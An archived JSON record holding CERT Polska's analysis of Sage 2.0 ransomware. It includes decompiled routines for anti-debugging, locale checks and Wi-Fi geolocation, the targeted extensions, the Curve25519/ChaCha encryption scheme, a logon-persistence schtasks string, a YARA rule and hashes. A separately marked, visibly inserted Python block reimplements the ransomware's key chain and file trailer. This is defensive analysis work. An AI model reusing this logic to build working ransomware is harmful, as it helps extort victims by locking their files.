{
	"id": "0c2a13ea-7b3a-4aa8-9c13-6f3746a80256",
	"created_at": "2026-04-06T00:14:12.419187Z",
	"updated_at": "2026-04-10T03:22:02.377843Z",
	"deleted_at": null,
	"sha1_hash": "7711abb9dde4b6cc993c61a591601b7b31556f26",
	"title": "Sage 2.0 analysis",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 947783,
	"plain_text": "Sage 2.0 analysis\r\nArchived: 2026-04-05 22:57:46 UTC\r\nIntroduction\r\nSage is a new ransomware family, a variant of CryLocker. Currently it’s distributed by the same actors that usually distribute Cerber, Locky and Spora.\r\nIn this case malspam is the infection vector. Emails from the campaign contain only a malicious zip file and no text. Inside the zip attachment there is a malicious Word document with a macro that downloads and installs the ransomware.\r\nAfter the ransomware starts, the Windows UAC prompt is shown repeatedly until the user clicks Yes. In the end the encryption process starts and all files are encrypted.\r\nThe ransom message directs us to a panel in the Tor network, but before we can log in we have to solve a captcha.\r\nhttps://www.cert.pl/en/news/single/sage-2-0-analysis/\r\nPage 1 of 16\r\nAnd finally we are greeted with a “user-friendly” panel. We can even chat with the malware creators.\r\nInterestingly, this ransomware doesn’t remove itself after encryption, but copies itself to the %APPDATA%\\Roaming directory and re-encrypts all files after every reboot (until the ransom is paid).\r\nTechnical analysis\r\nAfter this short introduction, we’ll focus on the technical side (because Sage 2.0 is not a completely generic ransomware; a few things are rather novel).\r\nThe main function of the binary looks like this:\r\nint main(int argc, const char **argv, const char **envp)\r\n{\r\n    ModCheck();\r\n    DebugCheck();\r\n    AntiDebug(v3);\r\n    if ( AntiDebugCheckMutex() )\r\n        return 0;\r\n    GetOrGenerateMainCryptoKey();\r\n    if ( IsProtectedLocale() )\r\n    {\r\n        FingerprintLocation(2);\r\n        Sleep(0x493E0u);   // 5 minutes\r\n        FingerprintLocation(2);\r\n        Sleep(0x927C0u);   // 10 minutes\r\n        FingerprintLocation(2);\r\n        SelfDelete();\r\n        result = 0;\r\n    }\r\n    else\r\n    {\r\n        if ( !CheckFingerprintLocation() )\r\n            return 0;\r\n        result = 
CreateThreadsAndEncrypt(\u0026mainEncKeyt);\r\n    }\r\n    return result;\r\n}\r\nAs we can see, there is a lot of fingerprinting and checking, though most of it is quite standard. The more interesting features include the following.\r\nDebug switch\r\nProbably something didn’t work on the first try, so there is a debug command line parameter to test that the configuration data is set correctly:\r\nLPWSTR *DebugCheck()\r\n{\r\n    cmdLine = GetCommandLineW();\r\n    result = CommandLineToArgvW(cmdLine, \u0026numArgs);\r\n    if ( numArgs == 2 )\r\n    {\r\n        result = (LPWSTR *)result[1];\r\n        if ( *result == 'd' \u0026\u0026 !*(result + 1) )   // argv[1] is exactly \"d\"\r\n        {\r\n            if ( AttachConsole(0xFFFFFFFF) )   // ATTACH_PARENT_PROCESS\r\n            {\r\n                stdout = GetStdHandle(0xFFFFFFF5);   // STD_OUTPUT_HANDLE\r\n                debugmsg = sprintf_0(\"{\\\"b\\\":\\\"%#.*s\\\"}\", 8, FingerprintDword + 4);\r\n                WriteFile(stdout, debugmsg, lstrlenA(debugmsg), \u0026NumberOfBytesWritten, 0);\r\n            }\r\n            ExitProcess(0);\r\n        }\r\n    }\r\n}\r\nAnd sure enough, the debug parameter does what it should. Someone probably forgot to remove this from the final version, because it is clearly a debugging feature.\r\nLocale check\r\nThe Sage 2.0 creators like some nations more than others:\r\nsigned int IsProtectedLocale()\r\n{\r\n    localeCount = GetKeyboardLayoutList(10, (HKL *)\u0026List);\r\n    if ( localeCount \u003c= 0 )\r\n        return 0;\r\n    i = 0;\r\n    if ( localeCount \u003c= 0 )\r\n        return 0;\r\n    while ( 1 )\r\n    {\r\n        next = (unsigned int)(\u0026List)[i] \u0026 0x3FF;   // primary language ID of the layout\r\n        if ( next == 0x23 || next == 0x3F || next == 0x19 || next == 0x22 || next == 0x43 || (_WORD)next == 0x85 )\r\n            break;\r\n        if ( ++i \u003e= localeCount )\r\n            return 0;\r\n    }\r\n    return 1;\r\n}\r\nThis checks the user’s keyboard layouts (the low 10 bits of each HKL are the primary language ID):\r\nnext == 0x23 -\u003e Belarusian\r\nnext == 0x3F -\u003e Kazakh\r\nnext == 0x19 -\u003e Russian\r\nnext == 0x22 -\u003e Ukrainian\r\nnext == 0x43 -\u003e Uzbek\r\nnext == 0x85 -\u003e Sakha\r\nWe’re a 
bit disappointed that Polish didn’t make it onto the exception list (if the Sage creators are reading this: our locale is 0x15).\r\nLocation fingerprinting\r\nSage tries to determine the host’s location by querying the Google Maps geolocation API (maps.googleapis.com) with the MAC address, SSID and signal strength of every Wi-Fi network in range:\r\nstrcpy_((int)arg0, \"/maps/api/browserlocation/json?browser=firefox\u0026sensor=true\");\r\ni = 0;\r\nif ( v12[1] )   // number of scanned networks\r\n{\r\n    offset = 0;\r\n    do\r\n    {\r\n        ss_ = (int)\u0026v12[offset + 2];\r\n        if ( *(_DWORD *)ss_ \u003c= 0x20u )   // SSID length must fit in 32 bytes\r\n        {\r\n            ToHexString(\u0026mac, (unsigned __int8 *)\u0026v12[offset + 12]);\r\n            str_append(ssid, (_BYTE *)(ss_ + 4), *(_DWORD *)ss_);\r\n            ssid[*(_DWORD *)ss_] = 0;\r\n            sprintf_1((int)arg0, \"\u0026wifi=mac:%s|ssid:%s|ss:%d\", \u0026mac, ssid, (*(_DWORD *)(ss_ + 60) \u003e\u003e 1) - 100);\r\n        }\r\n        ++i;\r\n        offset += 90;\r\n    }\r\n    while ( i \u003c v12[1] );\r\n}\r\n// ...\r\nDoHttpGetRequest((DWORD)\u0026dwNumberOfBytesAvailable, \"maps.googleapis.com\", 0x1BBu, v8)   // port 443\r\nCanary file\r\nBefore encryption Sage checks for the existence of a special debug file:\r\nif ( CreateFileW(L\"C:\\\\Temp\\\\lol.txt\", 0x80000000, 1u, 0, 3u, 0, 0) == (HANDLE)-1 )   // GENERIC_READ, FILE_SHARE_READ, OPEN_EXISTING\r\n{\r\n    // encryption code\r\n}\r\nThanks to this, the malware creators don’t have to worry about accidentally running the executable and encrypting their own files: encryption is only initiated if the file is not found. The flip side is that an empty C:\\Temp\\lol.txt acts as a vaccine against this build.\r\nExtension whitelist\r\nOf course, not every file is encrypted – only files with an extension on the target list are touched:\r\n.dat .mx0 .cd .pdb .xqx .old .cnt .rtp .qss .qst .fx0 .fx1 .ipg .ert .pic .img\r\n.cur .fxr .slk .m4u .mpe .mov .wmv .mpg .vob .mpeg .3g2 .m4v .avi .mp4 .flv\r\n.mkv .3gp .asf .m3u .m3u8 .wav .mp3 .m4a .m .rm .flac .mp2 .mpa .aac .wma .djv\r\n.pdf .djvu .jpeg .jpg .bmp .png .jp2 .lz .rz .zipx .gz .bz2 .s7z .tar .7z .tgz\r\n.rar .zip .arc .paq .bak .set .back .std .vmx 
.vmdk .vdi .qcow .ini .accd .db\r\n.sqli .sdf .mdf .myd .frm .odb .myi .dbf .indb .mdb .ibd .sql .cgn .dcr .fpx\r\n.pcx .rif .tga .wpg .wi .wmf .tif .xcf .tiff .xpm .nef .orf .ra .bay .pcd .dng\r\n.ptx .r3d .raf .rw2 .rwl .kdc .yuv .sr2 .srf .dip .x3f .mef .raw .log .odg .uop\r\n.potx .potm .pptx .rss .pptm .aaf .xla .sxd .pot .eps .as3 .pns .wpd .wps .msg\r\n.pps .xlam .xll .ost .sti .sxi .otp .odp .wks .vcf .xltx .xltm .xlsx .xlsm\r\n.xlsb .cntk .xlw .xlt .xlm .xlc .dif .sxc .vsd .ots .prn .ods .hwp .dotm .dotx\r\n.docm .docx .dot .cal .shw .sldm .txt .csv .mac .met .wk3 .wk4 .uot .rtf .sldx\r\n.xls .ppt .stw .sxw .dtd .eml .ott .odt .doc .odm .ppsm .xlr .odc .xlk .ppsx\r\n.obi .ppam .text .docb .wb2 .mda .wk1 .sxm .otg .oab .cmd .bat .h .asx .lua .pl\r\n.as .hpp .clas .js .fla .py .rb .jsp .cs .c .jar .java .asp .vb .vbs .asm .pas\r\n.cpp .xml .php .plb .asc .lay6 .pp4 .pp5 .ppf .pat .sct .ms11 .lay .iff .ldf\r\n.tbk .swf .brd .css .dxf .dds .efx .sch .dch .ses .mml .fon .gif .psd .html\r\n.ico .ipe .dwg .jng .cdr .aep .aepx .123 .prel .prpr .aet .fim .pfb .ppj .indd\r\n.mhtm .cmx .cpt .csl .indl .dsf .ds4 .drw .indt .pdd .per .lcd .pct .prf .pst\r\n.inx .plt .idml .pmd .psp .ttf .3dm .ai .3ds .ps .cpx .str .cgm .clk .cdx .xhtm\r\n.cdt .fmv .aes .gem .max .svg .mid .iif .nd .2017 .tt20 .qsm .2015 .2014 .2013\r\n.aif .qbw .qbb .qbm .ptb .qbi .qbr .2012 .des .v30 .qbo .stc .lgb .qwc .qbp\r\n.qba .tlg .qbx .qby .1pa .ach .qpd .gdb .tax .qif .t14 .qdf .ofx .qfx .t13 .ebc\r\n.ebq .2016 .tax2 .mye .myox .ets .tt14 .epb .500 .txf .t15 .t11 .gpc .qtx .itf\r\n.tt13 .t10 .qsd .iban .ofc .bc9 .mny .13t .qxf .amj .m14 ._vc .tbp .qbk .aci\r\n.npc .qbmb .sba .cfp .nv2 .tfx .n43 .let .tt12 .210 .dac .slp .qb20 .saj .zdb\r\n.tt15 .ssg .t09 .epa .qch .pd6 .rdy .sic .ta1 .lmr .pr5 .op .sdy .brw .vnd .esv\r\n.kd3 .vmb .qph .t08 .qel .m12 .pvc .q43 .etq .u12 .hsr .ati .t00 .mmw .bd2 .ac2\r\n.qpb .tt11 .zix 
.ec8 .nv .lid .qmtf .hif .lld .quic .mbsb .nl2 .qml .wac .cf8\r\n.vbpf .m10 .qix .t04 .qpg .quo .ptdb .gto .pr0 .vdf .q01 .fcr .gnc .ldc .t05\r\n.t06 .tom .tt10 .qb1 .t01 .rpf .t02 .tax1 .1pe .skg .pls .t03 .xaa .dgc .mnp\r\n.qdt .mn8 .ptk .t07 .chg .#vc .qfi .acc .m11 .kb7 .q09 .esk .09i .cpw .sbf .mql\r\n.dxi .kmo .md .u11 .oet .ta8 .efs .h12 .mne .ebd .fef .qpi .mn5 .exp .m16 .09t\r\n.00c .qmt .cfdi .u10 .s12 .qme .int? .cf9 .ta5 .u08 .mmb .qnx .q07 .tb2 .say\r\n.ab4 .pma .defx .tkr .q06 .tpl .ta2 .qob .m15 .fca .eqb .q00 .mn4 .lhr .t99\r\n.mn9 .qem .scd .mwi .mrq .q98 .i2b .mn6 .q08 .kmy .bk2 .stm .mn1 .bc8 .pfd .bgt\r\n.hts .tax0 .cb .resx .mn7 .08i .mn3 .ch .meta .07i .rcs .dtl .ta9 .mem .seam\r\n.btif .11t .efsl .$ac .emp .imp .fxw .sbc .bpw .mlb .10t .fa1 .saf .trm .fa2\r\n.pr2 .xeq .sbd .fcpa .ta6 .tdr .acm .lin .dsb .vyp .emd .pr1 .mn2 .bpf .mws\r\n.h11 .pr3 .gsb .mlc .nni .cus .ldr .ta4 .inv .omf .reb .qdfx .pg .coa .rec .rda\r\n.ffd .ml2 .ddd .ess .qbmd .afm .d07 .vyr .acr .dtau .ml9 .bd3 .pcif .cat .h10\r\n.ent .fyc .p08 .jsd .zka .hbk .mone .pr4 .qw5 .cdf .gfi .cht .por .qbz .ens\r\n.3pe .pxa .intu .trn .3me .07g .jsda .2011 .fcpr .qwmo .t12 .pfx .p7b .der .nap\r\n.p12 .p7c .crt .csr .pem .gpg .key\r\nNote that the list ends with certificate and private key formats (.pfx, .p12, .pem, .gpg, .key), so key material on the host is encrypted along with documents.\r\nEncryption\r\nAs usual, this is the most interesting part of ransomware code. Sage 2.0 is especially unusual because it encrypts files with elliptic curve cryptography.\r\nThe curve used is y^2 = x^3 + 486662x^2 + x over the prime field defined by 2^255 – 19, with base point x = 9. These values are not arbitrary: this curve is better known as Curve25519 and is the state of the art in modern cryptography. 
Not only is it one of the fastest ECC curves, it is also less vulnerable to a weak RNG, designed with side-channel attacks in mind, avoids many potential implementation pitfalls, and is (probably) not backdoored by any three-letter agency.\r\nCurve25519 is used with a hardcoded public key for shared secret generation. The exact code looks like this (structure and function names are ours):\r\nint __cdecl GenerateMainKey(curve_key *result, const void *publicKey)\r\n{\r\n    char mysecret[32]; // [esp+4h] [ebp-40h]@1\r\n    char shared[32]; // [esp+24h] [ebp-20h]@1\r\n    result-\u003eflag = 1;\r\n    GenerateCurve25519SecretKey(mysecret);                       // my_secret, random\r\n    ComputeCurve25519MatchingPublicKey(result-\u003egpk, mysecret);   // gpk = my_secret * G\r\n    ComputeCurve25519SharedSecret(shared, mysecret, publicKey);  // ECDH with the hardcoded operator key\r\n    ConvertBytesToCurve22519SecretKey(shared);                   // reuse the shared secret as a new secret key\r\n    ComputeCurve25519MatchingPublicKey(result-\u003epk, shared);      // pk = shared * G\r\n    return 0;\r\n}\r\nThis looks like a properly implemented Elliptic Curve Diffie-Hellman (ECDH) exchange, but neither private key is saved anywhere: they are needed only for decryption, and the shared secret can be recomputed by the malware operators from gpk and their own private key. It may look complicated, but almost all of those functions are just wrappers around a single ECC primitive, which we named CurveEncrypt. 
For example, computing the matching public key is curve25519(secretKey, basePoint), where basePoint is equal to 9 (one 9 and 31 zeroes):\r\nint __cdecl ComputeCurve25519MatchingPublicKey(char *outPtr, char *randbytes)\r\n{\r\n    char key[32]; // [esp+8h] [ebp-20h]@1\r\n    qmemcpy(key, \u0026Curve25519BasePoint, sizeof(key));\r\n    key[31] = Curve25519BasePointEnd \u0026 0x7F;   // clear the top bit of the u-coordinate\r\n    return CurveEncrypt(outPtr, randbytes, key);\r\n}\r\nShared key computation is very similar, but instead of the constant base point we use the other party’s public key:\r\nint __cdecl ComputeCurve25519SharedSecret(char *shared, char *mySecret, const void *otherPublicKey)\r\n{\r\n    char a3a[32]; // [esp+8h] [ebp-20h]@1\r\n    qmemcpy(a3a, otherPublicKey, sizeof(a3a));\r\n    a3a[31] \u0026= 0x7Fu;\r\n    return CurveEncrypt(shared, mySecret, a3a);\r\n}\r\nDue to the design of Curve25519, converting any sequence of 32 random bytes into a secret key is very easy – it’s enough to mask a few bits (the standard Curve25519 clamping: clear the low three bits, clear the top bit and set bit 254):\r\ncurve_key *__cdecl ConvertBytesToCurve22519SecretKey(curve_key *a1)\r\n{\r\n    curve_key *result; // eax@1\r\n    char v2; // cl@1\r\n    result = a1;\r\n    v2 = a1-\u003egpk[31];\r\n    result-\u003egpk[0] \u0026= 248u;\r\n    a1-\u003egpk[31] = v2 \u0026 0x3F | 0x40;\r\n    return result;\r\n}\r\nAnd, also because of this, secret key generation is completely trivial (it’s enough to generate 32 random bytes and convert them into a secret key the same way):\r\nint __cdecl GenerateCurve25519SecretKey(_BYTE *buffer)\r\n{\r\n    char v1; // al@1\r\n    getSecureRandom(32, (int)buffer);\r\n    v1 = buffer[31];\r\n    *buffer \u0026= 248u;\r\n    buffer[31] = v1 \u0026 0x3F | 0x40;\r\n    return 0;\r\n}\r\nThat’s all for the key generation. What about file encryption? 
Files are encrypted with ChaCha (an unconventional choice, again). Each file gets its own Curve25519 key pair: the ChaCha key is derived from the shared secret between the per-file secret and pk, and what gets appended to the output file is the per-file public key (plus 32 bytes of the main key structure), not the ChaCha key itself:\r\nGenerateCurve25519SecretKey(\u0026secretKey);                                         // fl_secret\r\nComputeCurve25519MatchingPublicKey(pubKey, \u0026secretKey);                          // fl_public\r\nComputeCurve25519SharedSecret(sharedSecret, \u0026secretKey, ellipticCurveKey-\u003epk);  // fl_shared = ECDH(fl_secret, pk)\r\n// ...\r\nChaChaInit(\u0026chaCha20key, (unsigned __int8 *)sharedSecret, (unsigned __int8 *)minikey);\r\nwhile (bytesLeftToRead) {\r\n    // Read from file into lpBuff\r\n    ChaChaEncrypt(\u0026chaCha20key, lpBuff, lpBuff, numBytesRead);\r\n    // Write lpBuff back to the file\r\n}\r\nAppendFileKeyInfo(hFile_1, ellipticCurveKey, \u0026FileSize, pubKey, a5);\r\nThe AppendFileKeyInfo function appends 32 bytes of the main curve_key structure and the per-file public key to the file, in a 0x60-byte trailer framed by two magic values:\r\nint __cdecl AppendFileKeyInfo(HANDLE hFile, curve_key *sharedKey, DWORD *dataSize, char *pubKey, int a5)\r\n{\r\n    DWORD dataSizeV; // edx@1\r\n    int result; // eax@3\r\n    _DWORD buffer[24]; // [esp+8h] [ebp-60h]@1\r\n    buffer[0] = 0x5A9EDEAD;                   // trailer start marker\r\n    qmemcpy(\u0026buffer[1], sharedKey, 0x20u);    // offset 4: 32 bytes of the main key structure\r\n    qmemcpy(\u0026buffer[9], pubKey, 0x20u);       // offset 36: per-file public key\r\n    dataSizeV = *dataSize;\r\n    buffer[19] = dataSize[1];                 // offset 72: original file size (64-bit)\r\n    buffer[18] = dataSizeV;\r\n    buffer[21] = a5;\r\n    buffer[20] = 0;\r\n    buffer[22] = 0x5A9EBABE;                  // trailer end marker; buffer[17] and buffer[23] are left uninitialised\r\n    if ( WriteFile(hFile, buffer, 0x60u, (LPDWORD)\u0026sharedKey, 0) \u0026\u0026 sharedKey == (curve_key *)96 )\r\n        result = 0;\r\n    else\r\n        result = -5;\r\n    return result;\r\n}\r\nThe two markers make Sage output easy to identify from the last 96 bytes of a file alone. ChaCha is not a popular algorithm among ransomware authors; it is closely related to Salsa20, which was used by Petya. 
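To make the chain of keys concrete, here is an added Python example; it is not code from the Sage sample or from this analysis. It reimplements the victim-side steps above (the main key pair, the per-file key pair and the 0x60-byte trailer written by AppendFileKeyInfo) with a from-scratch RFC 7748 X25519 standing in for the sample's CurveEncrypt, and then shows what the text only states: the operators, holding their private key (c2_secret below), can rebuild the per-file shared secret from the two public values left in the file. Assumptions: the 32 bytes copied from the curve_key structure are taken to be gpk, the two DWORDs the sample leaves uninitialised are zeroed, and the step from fl_shared to the ChaCha key and nonce (minikey) is not modelled because the page does not describe it.

```python
import os
import struct

P = 2**255 - 19
A24 = 121665
BASE_POINT = (9).to_bytes(32, 'little')   # one 9 and 31 zeroes, as in the decompiled code


def clamp(raw32):
    # Same masking as GenerateCurve25519SecretKey / ConvertBytesToCurve22519SecretKey:
    # raw[0] &= 248; raw[31] = raw[31] & 0x3F | 0x40 (clear bit 255, set bit 254).
    k = bytearray(raw32)
    k[0] &= 248
    k[31] = (k[31] & 0x3F) | 0x40
    return bytes(k)


def x25519(secret, point):
    # RFC 7748 Montgomery ladder; stands in for the sample's CurveEncrypt primitive.
    k = int.from_bytes(clamp(secret), 'little')
    x1 = int.from_bytes(point, 'little') & ((1 << 255) - 1)   # point[31] &= 0x7F
    x2, z2, x3, z3, swap = 1, 0, x1, 1, 0
    for t in range(254, -1, -1):
        kt = (k >> t) & 1
        swap ^= kt
        if swap:
            x2, x3, z2, z3 = x3, x2, z3, z2
        swap = kt
        a, b = (x2 + z2) % P, (x2 - z2) % P
        aa, bb = a * a % P, b * b % P
        e = (aa - bb) % P
        c, d = (x3 + z3) % P, (x3 - z3) % P
        da, cb = d * a % P, c * b % P
        x3 = (da + cb) * (da + cb) % P
        z3 = x1 * (da - cb) * (da - cb) % P
        x2 = aa * bb % P
        z2 = e * (aa + A24 * e) % P
    if swap:
        x2, x3, z2, z3 = x3, x2, z3, z2
    return (x2 * pow(z2, P - 2, P) % P).to_bytes(32, 'little')


def sage_main_key(c2_public, my_secret=None):
    # GenerateMainKey on the victim side. Neither my_secret nor sh_secret is ever stored;
    # only the two public values gpk and pk survive.
    my_secret = clamp(my_secret or os.urandom(32))
    gpk = x25519(my_secret, BASE_POINT)                # my_public
    sh_secret = clamp(x25519(my_secret, c2_public))    # ECDH result reused as a secret key
    pk = x25519(sh_secret, BASE_POINT)                 # sh_public
    return gpk, pk


def sage_file_key(pk, fl_secret=None):
    # Per-file key pair; fl_shared is what ChaChaInit receives (key derivation not modelled).
    fl_secret = clamp(fl_secret or os.urandom(32))
    fl_public = x25519(fl_secret, BASE_POINT)
    fl_shared = x25519(fl_secret, pk)
    return fl_public, fl_shared


# 0x60-byte trailer written by AppendFileKeyInfo, field order of the _DWORD buffer[24].
TRAILER_FMT = '<I32s32sIQIIII'
TRAILER_HEAD, TRAILER_TAIL = 0x5A9EDEAD, 0x5A9EBABE


def build_trailer(gpk, fl_public, file_size, a5=0):
    # Assumption: the 32 bytes copied from the curve_key structure are gpk.
    # buffer[17] and buffer[23] are never set by the sample; zeroed here.
    return struct.pack(TRAILER_FMT, TRAILER_HEAD, gpk, fl_public, 0,
                       file_size, 0, a5, TRAILER_TAIL, 0)


def parse_trailer(data):
    # Forensic helper: recover the public values and original size from an encrypted file.
    if len(data) < 0x60:
        raise ValueError('file too short to carry a Sage trailer')
    head, gpk, fl_public, _, size, _, a5, tail, _ = struct.unpack(TRAILER_FMT, data[-0x60:])
    if head != TRAILER_HEAD or tail != TRAILER_TAIL:
        raise ValueError('Sage trailer markers not found')
    return {'gpk': gpk, 'fl_public': fl_public, 'size': size, 'a5': a5}


def operator_recover_file_key(c2_secret, data):
    # What the operators can do with their private key. ECDH is symmetric, so
    # X25519(c2_secret, gpk) == X25519(my_secret, c2_public) gives sh_secret, and
    # X25519(sh_secret, fl_public) == X25519(fl_secret, pk) gives fl_shared.
    t = parse_trailer(data)
    sh_secret = clamp(x25519(c2_secret, t['gpk']))
    return x25519(sh_secret, t['fl_public'])


def demo(c2_secret=None):
    # Constructed run: operator key pair, one victim, one encrypted file.
    c2_secret = clamp(c2_secret or os.urandom(32))
    c2_public = x25519(c2_secret, BASE_POINT)
    gpk, pk = sage_main_key(c2_public)
    fl_public, fl_shared = sage_file_key(pk)
    body = os.urandom(1000)   # stands in for the ChaCha ciphertext
    data = body + build_trailer(gpk, fl_public, len(body))
    return operator_recover_file_key(c2_secret, data) == fl_shared


if __name__ == '__main__':
    print('operator can rebuild the per-file key:', demo())
```

parse_trailer is the piece an incident responder would reuse: it recognises Sage output from the two markers in the last 96 bytes and yields the original size, the victim's gpk and the per-file public key, which is exactly what must reach someone holding c2_secret before a file can be decrypted. Without that private key the defender holds only public values, and the ladder above offers no shortcut.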
We don’t know why AES was not good enough for Sage; probably it is only trying to be different.\r\nIn other words, there are two long-term key pairs (my_* and sh_*) plus one key pair for every encrypted file:\r\nmy_secret \u003c- random\r\nmy_public \u003c- f(my_secret) # gpk\r\nsh_secret \u003c- f(my_secret, c2_public)\r\nsh_public \u003c- f(sh_secret) # pk\r\nfl_secret \u003c- random\r\nfl_public \u003c- f(fl_secret)\r\nfl_shared \u003c- f(fl_secret, sh_public)\r\nchachakey \u003c- f(fl_shared)\r\nAfter the ransomware finishes we know only my_public, sh_public and fl_public, but we need chachakey (and therefore fl_shared, which is never written anywhere) to actually decrypt the file. The operators, on the other hand, hold c2_secret, so they can recompute sh_secret from my_public and then fl_shared from fl_public.\r\nThis encryption scheme is quite solid because it makes offline encryption possible – there is no need to contact the C\u0026C and negotiate encryption keys, since the operators’ public key is hardcoded in the binary – and because of the asymmetric cryptography, decryption without the operators’ private key is impossible. Assuming that the malware creators didn’t make any drastic implementation mistakes (and we have no reason to suspect that they did), recovery of encrypted files is impossible. Of course, it’s always possible that the master encryption key will eventually be leaked or released.\r\nAdditional information\r\nYara rules:\r\nrule sage\r\n{\r\n    meta:\r\n        author=\"msm\"\r\n    strings:\r\n        /* ransom message */\r\n        $ransom1 = \"ATTENTION! ALL YOUR FILES WERE ENCRYPTED!\"\r\n        $ransom2 = \"SAGE 2.0 uses military grade elliptic curve cryptography and you\"\r\n        /* other strings */\r\n        $str0 = \"!Recovery_%s.html\"\r\n        $str1 = \"/CREATE /TN \\\"%s\\\" /TR \\\"%s\\\" /SC ONLOGON /RL HIGHEST /F\"\r\n        /* code */\r\n        $get_subdomain = {8B 0D ?? ?? 40 00 6A ?? [2] A1 ?? ?? 40 00 5? 5? 50 51 53 E8}\r\n        $debug_file_name = {6A 00 6A 01 68 00 00 00 80 68 [4] FF 15 [4] 83 F8 FF}\r\n        $get_request_subdomain = {74 ?? A1 [4] 5? 5? 68 ?? ?? 
40 00 E8}\r\n        $get_ec_pubkey = {68 [2] 40 00 68 [2] 40 00 E8 [4] 68 B9 0B 00 00 6A 08 E8}\r\n        $get_extensions = { 8B 35 [2] 40 00 [0-3] 80 3E 00 74 24 }\r\n    condition:\r\n        all of ($ransom*) and any of ($str*)\r\n        and any of ($get_subdomain, $debug_file_name, $get_request_subdomain, $get_ec_pubkey, $get_extensions)\r\n}\r\n$str1 is a schtasks.exe command line: a task run at every logon (/SC ONLOGON) with the highest privileges (/RL HIGHEST), consistent with the re-encryption after every reboot noted in the introduction.\r\nHashes (sha256):\r\nsample 1, 362baeb80b854c201c4e7a1cfd3332fd58201e845f6aebe7def05ff0e00bf339\r\nsample 2, 3b4e0460d4a5d876e7e64bb706f7fdbbc6934e2dea7fa06e34ce01de8b78934c\r\nsample 3, ccd6a495dfb2c5e26cd65e34c9569615428801e01fd89ead8d5ce1e70c680850\r\nsample 4, 8a0a191d055b4b4dd15c66bfb9df223b384abb75d4bb438594231788fb556bc2\r\nsample 5, 0ecf3617c1d3313fdb41729c95215c4d2575b4b11666c1e9341f149d02405c05\r\nAdditional information:\r\nhttps://www.govcert.admin.ch/blog/27/saga-2.0-comes-with-ip-generation-algorithm-ipga – a short but very condensed analysis by the Swiss CERT.\r\nSource: https://www.cert.pl/en/news/single/sage-2-0-analysis/
",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.cert.pl/en/news/single/sage-2-0-analysis/"
	],
	"report_names": [
		"sage-2-0-analysis"
	],
	"threat_actors": [],
	"ts_created_at": 1775434452,
	"ts_updated_at": 1775791322,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/7711abb9dde4b6cc993c61a591601b7b31556f26.pdf",
		"text": "https://archive.orkl.eu/7711abb9dde4b6cc993c61a591601b7b31556f26.txt",
		"img": "https://archive.orkl.eu/7711abb9dde4b6cc993c61a591601b7b31556f26.jpg"
	}
}